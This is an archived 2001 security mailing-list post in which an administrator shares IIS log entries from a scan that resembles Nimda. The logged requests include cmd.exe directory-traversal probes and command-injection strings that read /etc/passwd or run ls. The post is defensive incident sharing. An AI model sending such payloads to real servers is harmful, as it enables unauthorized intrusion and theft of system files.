possible new Nimda variant

From: Howard Gleason (howard.gleasonat_private)
Date: Fri Nov 16 2001 - 05:53:01 PST

Next message: Steve Halligan: "RE: possible new Nimda variant"

Previous message: dschultzat_private: "RE: port 6635 and port 9705"
Next in thread: Steve Halligan: "RE: possible new Nimda variant"
Reply: Steve Halligan: "RE: possible new Nimda variant"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Mailer: SecurityFocus Anyone else seen this, it hit my IIS logs last night. It has some similarities to Nimda but not identical. -------------------------------------------------- #Fields: date time c-ip cs-username s-sitename cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent) 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD / - 400 87 138 19 47 80 HTTP\1.0 - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /msadc/ - 404 2 143 26 15 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 16 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /scripts/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir 500 87 0 98 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /bin/ - 404 2 143 24 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /samples/ - 404 2 143 28 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_cnf/ - 404 2 143 29 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/ - 404 2 143 29 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 98 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 89 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /winnt/system32/cmd.exe /c+dir 404 3 604 125 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.ida - 404 2 143 33 15 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /lanscan.idq - 404 2 143 33 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfdocs/ - 404 2 143 27 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cfide/ - 404 2 143 26 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_inf.html - 404 2 143 35 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /tsweb - 404 2 143 27 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /_vti_bin/_vti_aut/ - 404 3 143 39 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp::$DATA - 404 2 604 39 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 GET /default.asp. - 404 2 604 35 0 80 HTTP/1.0+ - 2001-11-15 23:23:22 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ - 404 2 143 28 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Default.htm - 200 0 278 22 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /carbo.ddl - 404 2 143 31 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /technote/ - 404 2 143 29 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /iisadmpwd/ - 404 2 143 30 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-dos/ - 404 2 143 28 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/ - 403 5 143 28 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /scripts/perl.exe - 404 2 143 36 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /mall_log_files/ - 404 2 143 35 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /Admin_files/ - 404 2 143 32 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /quote.html - 404 2 604 31 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/ikonboard/ - 404 3 143 38 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /foldoc/ - 404 2 143 27 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/adcycle/ - 404 3 143 36 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /ROADS/ - 404 2 143 26 16 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /way-board/ - 404 2 143 30 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 HEAD /cgi-bin/a1stats/ - 404 3 143 36 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /index.php chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc 404 2 604 71 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /scripts/shopplus.cgi dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd| 404 2 604 98 0 80 HTTP/1.0+ - 2001-11-15 23:23:23 64.14.103.102 - W3SVC1 GET /edit_image.php dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 404 2 604 86 0 80 HTTP/1.0+ - ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com

Next message: Steve Halligan: "RE: possible new Nimda variant"
Previous message: dschultzat_private: "RE: port 6635 and port 9705"
Next in thread: Steve Halligan: "RE: possible new Nimda variant"
Reply: Steve Halligan: "RE: possible new Nimda variant"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 16 2001 - 08:28:52 PST